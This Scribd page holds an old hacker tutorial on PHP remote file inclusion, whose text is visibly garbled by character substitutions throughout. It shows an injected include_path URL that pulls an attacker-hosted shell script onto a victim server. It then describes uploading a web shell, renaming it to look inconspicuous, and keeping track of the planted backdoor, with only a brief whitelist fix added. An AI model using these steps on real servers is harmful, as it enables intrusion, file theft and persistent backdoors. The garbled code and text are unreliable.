Scribd Logo
Upload

Welcome to Scribd!

  • Every Hacker Dreams of Running Their Own Code On A Target Server or Better Yet

    Uploaded by

    Vinayak Wadhwa
    0 views2 pages
    Coding

    Original Title

    Every Hacker Dreams of Running Their Own Code on a Target Server or Better Yet

    Copyright

    © © All Rights Reserved

    Available Formats

    DOC, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Coding

    Copyright:

    © All Rights Reserved
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    0 views2 pages

    Every Hacker Dreams of Running Their Own Code On A Target Server or Better Yet

    Uploaded by

    Vinayak Wadhwa
    Coding

    Copyright:

    © All Rights Reserved
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    Every Hacker dreams of running their own code on a target server or better yet, a

    graphical way of browsing remote files. So lets see how its done
    PHP is extremely susceptible to this due to the default settings for register_globals and
    allow_url_fopen being turned on, most admins of PHP sites forget that these options
    leave their sites exploitable. ou may ask !"ut how do we know if these are set to on#!
    ou$ll be able to tell when they$re on, the exploit wont work..
    %ow lets have a look at an example exploit off the top of my head&
    '#php
    ((header and config stuff here
    include)*_+E,-$include_path$./0
    ((footer
    #1
    So if we can manipulate include_path we can redirect it to our arbitrary file so lets say we
    punch in
    2ictim.com(test.php#include_path3http&((example.com(shell.txt#
    ,his would make the php script, test.php, go and get our arbitrary script, script.txt, and
    include and parse it.
    4rom here we could execute server side commands as the currently logged in user, use
    privilege escalation exploits, access files located on the server )config files are of
    particular interest/.
    ,he fix
    register_globals and allow_url_fopen off in your php.ini.
    5r chuck this bit of code in )was written very 6uickly lol, and edit where needed/
    '#php
    ((4iles allowed&.
    *allowed4iles 3 array)$config.php$,$other_file.php$,$and_another.php$/0
    if)in_array))string/*_+E,-$include_path$.,*allowed4iles// 7
    include)*_+E,-$include_path$./0
    8
    else7
    exit)$not allowed$/0
    8
    #1
    9nother exploitable code&
    '#php
    (:
    :: ;onster ,op <ist =.>
    :: Supplied "y& lord
    :: %ullification "y& ?ygote
    :: :(
    re6uire *root_path . !sources(func_output.php!0
    *mtl 3 new ,op<ist0
    *mtl@1license-$domain$. 3 *domainf0
    *mtl@1license-$date$. 3 *exp0
    *mtl@1start_timer)/0
    *mtl@1input 3 *mtl@1input)/0
    class ,op<ist
    7 var *make_mail0
    var *time 3 !!0
    var *input 3 array)/0
    So we can obviously see here that re6uire *root_path . !sources(func_output.php!0 is the
    piece of code at fault here.
    A upload something a bit prettier, say BCC# first we find a folder on the server that the
    currently logged on user has read(write permission to. A chose to browse through to
    victimsite.com(topsites(html(s=(sources(, uploaded cCC.php and renamed it to sources.php
    )looks less conspicuous/
    Demember to write down where you left your shell )or another backdoor of your choice/
    9nd there we have it, Demote 4ile Ancludes in all their glory.
    Play SafeE
    "/"/"/

    You might also like